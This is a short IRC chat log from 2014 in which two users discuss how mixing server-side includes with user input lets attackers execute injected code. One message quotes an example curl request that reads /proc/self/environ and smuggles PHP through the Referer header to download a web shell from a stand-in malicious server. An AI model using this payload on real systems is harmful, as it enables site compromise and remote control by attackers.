IRC log for #sourcefu, 2014-03-05

http://sourcefu.com

All times shown according to UTC.

Time S Nick Message
03:19 codex yea
03:19 codex but the scary part is that it gets you write
03:19 codex because of the "loopback" trick -- getting the user supplied vars to spit back + execute
03:22 pdurbin this example: curl http://www.example.com/user1/x.cgi?file=/proc/self/environ --referer "echo \"<?php system('wget -O /home/user1/public_html/shell.cgi http://malicious-server.com/shell.cgi'); ?> | php\""
03:24 pdurbin codex: you emphasize the problem adequately: "You should never mix INCLUDES with dynamic code – specifically, anything that allows user input. This is just a terrible idea."
11:51 sivoais_ joined #sourcefu
12:20 onder`_ joined #sourcefu
16:47 sivoais joined #sourcefu
18:56 lorachka joined #sourcefu
21:16 hydrargium joined #sourcefu